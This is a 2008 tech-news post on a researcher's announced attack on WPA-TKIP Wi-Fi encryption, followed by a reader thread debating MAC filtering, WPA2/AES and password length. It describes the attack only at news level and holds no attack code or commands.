They always knew it could be done; that a hacker with enough time and
processing power could watch your WPA-protected wireless network and, eventually, decrypt your precious datas. In under 15 minutes, though? "Inconceivable!" those hypothetical security experts would say -- but they're about to get a lesson from WiFi wizard Erik Tews. He'll be giving a presentation next week at the PacSec Conference in Tokyo, describing the "mathematical breakthrough" that, he says, enables him to crack WPA-TKIP in 12 to 15 minutes. There are some limitations, as the data sent from a connected device to the compromised router is apparently still safe, but anything headed t'other way is wide open, and could even be supplanted by bogus bits sent from a Cheetos-munching hacker slouching in a rusty Ford Taurus in the parking lot. Don't believe us? Tews was the guy able to
crack WEP in under a minute last year, ironically advising people to switch to WPA ASAP at the time. We can only assume
WPA2 is next.
posted Nov 6th 2008 10:58AM
...if they use a simple password.
WAG325N in the picture. Great router!
in 15 minutes, not anymore....
I thought this was old news?
I have a chinese program which takes about 3 minutes to break WEP and about 20 minutes to break WPA. It sends millions of packets to the router and recognizes the rejected packet's properties to figure out the true code.
Wow, I'm shocked. Flashpoint is a script kiddie. Who woulda thunk it?
@ Flashpoint
I guess this method reads the data being set out and decrpyts it. It's passive, he's eavesdropping and can then choose to send info.
The problem with those programs you've mentioned is that they can probably be detected.
Surely if you set up your router right, with restricted MAC addresses, these programs won't work and even this guy wouldn't be able to send you data (though he'd still be ale to read what you're sending).
For an alternate method try TEMPEST (http://en.wikipedia.org/wiki/TEMPEST).
@Carpet
MAC cloning isn't a difficult task. Blocking by MAC address is useful, but not fool-proof.
---
Jeez, I hope AES lasts a while. I don't feel like having to buy a new router just because of something like this.
This building's walls are lined with lead. Good luck getting a signal, b*tch! :)
WPA2 isn't going to get cracked very easily. It uses AES as the base of its encryption and that's a lot more secure than TKIP.
""Inconceivable!" those hypothetical security experts would say..."
http://www.youtube.com/watch?v=G2y8Sx4B2Sk
No, that's not what they said. All security protocols get cracked, sooner or later. What they meant was, there was no published attack against WPA at that time, so it was inconceivable at that time. No serious security professional would ever say anything is going to be secure forever.
AlekZander, you're a bigger buzzkill than Buzz Killington.
Hello. My name is Hung Le. You killed my buzz. Prepared to be low-ranked.
Hello. My name is...
So when's the new security standard coming out? Hey, router guys?
alright . . . whats the next gen of wireless security? cause WPA2 is not far from dead now
The safest way, physical wires... forego wireless if you can...
Are physical wires even safe? Wasn't it just a month ago that they figured out how to wirelessly record keystrokes from a wired keyboard because of mild electrical pulses coming off the wire? I think the only way to really be safe is to just crawl into John McCain's computerless cave and live out the rest of your life disconnected and alone.
WPA3
With the ease that WEP and WPA can be hacked, is it helpful to use MAC address filtering on your home wi-fi router? I have been using this for a while, but I don't know how much this really helps. Is it relatively easy to capture and then spoof the MAC addresses on your filter list?
actually you can see the connected computers without hacking, and of course see their mac address as well. kism@c
this part is easy.
then you can change your mac address with little tools. spoofm@c
this part is easier.
mac filtering is not safe.
MAC filtering it only useful for keeping out accidental connections. MAC addresses are easily captured and spoofed.
In all honesty if you have WPA turned on you have very little to worry about. 99% of the population wouldn't know how to hack you and the other 1% don't need to because there are easier targets.
All Mac filtering does is keep your computer illiterate neighbors from leeching. As a security measure it is worthless.
Mac addys can be spoofed, but yeah, it's an excellent way to keep your neighbor (or even someone you know, trying to get a non-approved-by-you device onto the network) off of your wifi network. The best advice here is to close down your network as much as possible. For instance, don't share the root of a drive, period, and absolutely don't share the root of a drive with a computer that is connected via wifi. Don't give write privileges to your network shares either. WPA or WPA2 are going to keep all but the most computer savvy neighbors off of your network. If you are really paranoid, encrypt your data on your HDD, so that if some script kiddy does get in, he's not getting any personal info anyway. He may be able to crack WPA, but he isn't going to crack AES 256. If you make sure your banks website (or any site you use your credit card on) is using SSL, then that data is encrypted and you don't need to worry about that anyway.
Oh, and another tip for keeping neighbors off of your Wifi, is making sure they don't get a signal. Point the signal at your devices that need it, instead of letting it send out waves in every direction (you can accomplish this with a parabolic reflector). Also, limit the number of DHCP addresses that your router can assign. If you have 3 devices total, and they are all on at all times, you only need to allow your router to give 3 IP addresses total.
Oh, and FFS, make sure your router has a secure (10+ character, numbers and letters, if not numbers letters and symbols) password. The best security can be foiled in an instant if you are using the default login of your router.
Oh, and I almost forgot, turn off announcing on your router if you haven't already done so. Basically, when a router announces it's presence, anyone with a decent Wifi card can find it. Adding the extra step of having to manually enter in the name of the AP is going to keep most people off. Sure, someone could still capture packets, and eventually figure out where they are coming from, but chances are they aren't going to bother. The only problem is that you'll need to enter in the name of the AP on every computer/device/etc you need to connect via Wifi, but it's one extra security measure that most people don't use.
Problem is the then hacker can lock you out of your own network. MAC filtering is really a no-win situation with hackers. If MAC filterings intentions are to keep out would-be computer-illiterate neighbors then use WPA, or WPA2 if you can.
pfffff mac filtering , but that wont be difficult...
"enables him to crack WPA-TKIP in 12 to 15 minutes. There are some limitations, as the data sent from a connected device to the compromised router is apparently still safe"
So he hasn't cracked WPA-TKIP at all then, if it were cracked then data in both directions would be compromised.
Until you enable packet duplication on the compromised router to send any incoming packets out to another mac, namely, that of the eavesdropper. A compromised router is just that - compromised, and all bets are off on protecting any packets coming into it.
MAC filtering is useless as MAC addresses are unencrypted, visible, and easily spoofed even using Windows.
It has been known for some time that TKIP is broken and this is why for almost 2 years I have had my clients on AES / WPA2 using a 63 character randomly generated password.
I owe everything I know about WIFI security to Security Now Podcast with Steve Gibson, he explains things far better than any course or book could.
Yep, best advise possible. WPA2 w/ AES, 63 character random password from https://www.grc.com/passwords.htm
MAC Filtering is worse then WEP for security. Same with SSID hiding. That is why I don't bother with either of them.
Only negative on the 63 character random password: real real hard to type on an iPhone.
Actually NOT using 63 chars is going to be safer - Telling people how long your password is helps them, now they know only to try 63 char passwords. Using any other length password and NOT telling the world about it is going to mean they have to test all passwords from length 1 to 62.
@FuzzyCat
You go ahead and brute force a 63 byte passphrase. Let me know how that works out after the heat-death of the universe.
Stupid advise. 63 character password is better than 62.
@Phil
The point is telling someone it's 63 chars still means they aren't wasting cpu cycles on shorter passwords. I know that brute forcing 63 chars isn't exactly quick but knowing it's 63 chars long cuts out trillions of possibilities that would still need to be tested.
Let's say you allow upper and lower case chars and digits - that gives 26+26+10 = 62 chars to try per char in the password, a 4 character password has 62 x 62 x 62 x 62 = 14,776,336 possible combinations. While these are 'short' they would still be wasting cpu cycles - KNOWING you only have to test 63 chars cuts out test ALL of the shorter passwords - ideally you want them to have to test them all.
@Kiff
Obviously 63 chars is stronger than 62. You missed the point completely. Which do you think will take more time -
a) Brute force 63 char password
b) Brute force 1 char password, then a 2 char password, then a 3 char password, then a... etc up to 63 chars?
@FuzzyCat
That almost sounds like a good idea until you realize that there are more 63 char passphrases than 1-62 characters ones combined.
Do you think he has a sign on his door saying his password is 63 characters long? Posting here in an anon fashion is hardly a security vulnerability for him. Your argument is baseless. I think you just like to argue.
Knowing it is 63 characters does not help them at all, it still leaves them with 2.28273036 × 10^113 possible combinations, this is larger than the number of atoms in the universe. Good luck with that.
To put that number in perspective some more:
63^63 = 2.28 x 10^113 (number of codes)
Lets say you can do 3 trillion checks a second.
2.28 x 10^113 / 3000000000000 = 7.60910121 × 10^100 seconds
Now, lets convert that to years:
7.60910121 × 10^100 / 60 minutes / 24 hours / 365 days = 1.4476981 × 10^95 years
Also, remember, this is just an alpha numeric code, forgetting spaces and symbols characters which greatly add to the complexity.
hmm... its actually 62 ^ 62, but the fact remains the number is still ridiculously large
Oh, and as for my "Atoms in the universe" comment I now see its "Atoms in the OBSERVABLE universe"
http://en.wikipedia.org/wiki/Observable_universe#Matter_content
Listen to this man: "Josh @ Nov 6th 2008 1:53PM
Do you think he has a sign on his door saying his password is 63 characters long? Posting here in an anon fashion is hardly a security vulnerability for him. Your argument is baseless. I think you just like to argue."
He's mostly right. This isn't a real argument. You naysayers forget that telling someone your password length will compromise your security, REGARDLESS of length.
Let me reiterate: Telling someone your password length will compromise your security, REGARDLESS of length.
@FuzzyCat
What's going to take longer:
(a) Brute forcing a 63 character password without knowing it's 63 characters?
(b) Brute forcing one that's 8 to 62 (8 is the minimum) without knowing it's 8-62?
HOLY SHIT, IT'S FUCKING MAGIC.
WOW! A proper technical discussion on Engadget! Who'd have thought?!
*wipes the tear from his eye*
@Hung
I am not debating the fact that it will take longer if you dont know its already 63, but when its already going to take nearly 10,000,000,000,000,000,000,000,000,000,000,000,000, 000,000,000,000,000,000,000,000,000,000,000,000,000,000,000, 000,000,000,000,000,000 years to brute force a 63 character password, I dont think it really matters.
This WPA crack revolves around flaws in the encryption algorithm itself, not how you choose your password.
@Paul
I'm not saying it wouldn't take a long time, I've never said that. You are of course assuming that the password isn't discovered until the very last itteration which is as likely as me being bothered to try :)
I would like to chime in.
@Fuzzycat
If they start with 63 characters and work their way down, instead of starting at 1 and working their way up. Then you lose again.
security...like control, is an illusion
Offense is the best defense.
The best security is common sense. Be careful what you do and how you do it because someone could be watching and no amount of encryption will ever be foolproof. If somebody wants your shit, they're going to get it.
Those crafty sewer thieves.
I thought you might be worried . . . about the security . . . of your shit.
This is why I have a trace buster tracer bust.
What if you are using WPA2 with AES? Still crackable?
My impression from the article is that WPA2 and AES hasn't been cracked yet.
I think that also means that WPA that uses AES is fine too.
AES appears to be really secure (it's proper name is Rijndael), no one's yet managed to find a weakness in its method. The US government approves it for encrypting its classified documents, so don't fret too much.
That said, if a genius mathematician comes along and find a sequence to predict prime numbers, we're all screwed as pretty much all encryption ciphers these days work on the product of prime numbers.
Not yet, but typically the problem is not so much with the algorithm itself, but the way it's implemented within a wireless network. Wireless is just inherently insecure.
Wait, isn't "What, me worry" the theme of Alfred E. Newman, the guy on the cover of Mad Magazine...? I think you (engadget) were attempting a "Cracked" reference, right?
And what chinese program is that?
I can't pronounce the Chinese characters, but on the super, super, secret site he downloaded the prog from, they translate roughly as "The Temple of Grandiose & Ignorant Posturing." Or something like that. Chinese is really hard.
In the semi-country where I live, even a WEP is overkill. Plus, my router won't reach further than my property anyways.
This entire topic is moot for most home users. More applicable to the business environment. No one is going to camp outside your house cracking your security to find out what is in your yahoo email or what your family tree has in it. People break security where there is money to be made and that is not USUALLY in the residential arena.
Sorta... When I go on vacation and I need an internet connection I have been known to drive around looking for an open WiFi connection, I can see people with WEP / WPA cracking tools doing the same thing but more maliciously.
@ Josh
Unless you're Sarah Palin!
>>He'll be giving a presentation next week at the PacSec Conference in Tokyo, describing the "mathematical breakthrough" that, he says, enables him to crack WPA-TKIP in 12 to 15 minutes.
>>enables him to crack WPA-TKIP in 12 to 15 minutes.
>>WPA-TKIP
>>TKIP
That's fine. Wake me up when he can crack WPA-AES.
OMG
I just hope this guy can publish this, so I can finally f**** my neighbour's wpa-tkip wifi. I must work from home lol
Looks like we'll all just have to start Quantum encrypting all our routers now...
Come on Physicists, get us a market solution!
p.s. i put quantum in capitals because its just that cool a word.
Which leads to wireless routers packing more of a grunt, and in turn beeing hacked into actually doing something usefull.
The problem with random 63 character passwords is that you are enforcing a "write it on a post-it note" policy. The point about announcing the length of the key is a valid one, but 64 factoral = a lot of brute forcing.
As usual the issue with the migration to wpa2 is that your older wireless devices may not support it. I am talking tivos , phones and nintendo dss. You can set up two wireless networks if you have to....
I havent played with the new code, it looks like the shared session secret is discovered, only individual tkip sessions...? Maybe.
Man, it's time to change my password. When I originally had my router setup (WPA-AES) I gave it a 63 key but for some reason it wouldn't jive with my PS3 so I just changed it to "88888888". Someone is probably stealing my internetz right now.
Banana- Are you serious? MAC addy's? Must every term be abbreviated or have a nickname? I'll add that to the list with Sammy and Panny...
Folks, I don't think they are talking about cracking TKIP-PSK passphrases. Getting your hands on a passphrase will get you network access, but will NOT allow you to sit and monitor your neighbors actual packets traveling the airwaves, those are still encrypted. What Tews seems to be suggesting is that he is able to easily crack encryption on outbound packets heading from a WAP to an associated client. This is a big step up from simply gaining network access, Tews can now packet sniff your encrypted data.
Death to script kiddies.
"Back in '82"
Geez, WEP Aand WPA-PSK have been cracked since 2004/2005. Why is this so much hype?
http://docs.lucidinteractive.ca/index.php/Cracking_WEP_and_WPA_Wireless_Networks
http://blogs.zdnet.com/Apple/?p=65
http://www.informit.com/articles/article.aspx?p=369221
JMan, read my post above yours. This isn't an announcement that Tews has found a way to steal the PSK passphrase ... he has actually cracked part of the encryption on individual link layer frames, so he can read the information traveling the radio waves and packet sniff them... that's much more significant than simply getting a passphrase. So instead of just getting free internet, malicious users could now sit and read your personal data you just sent in an email.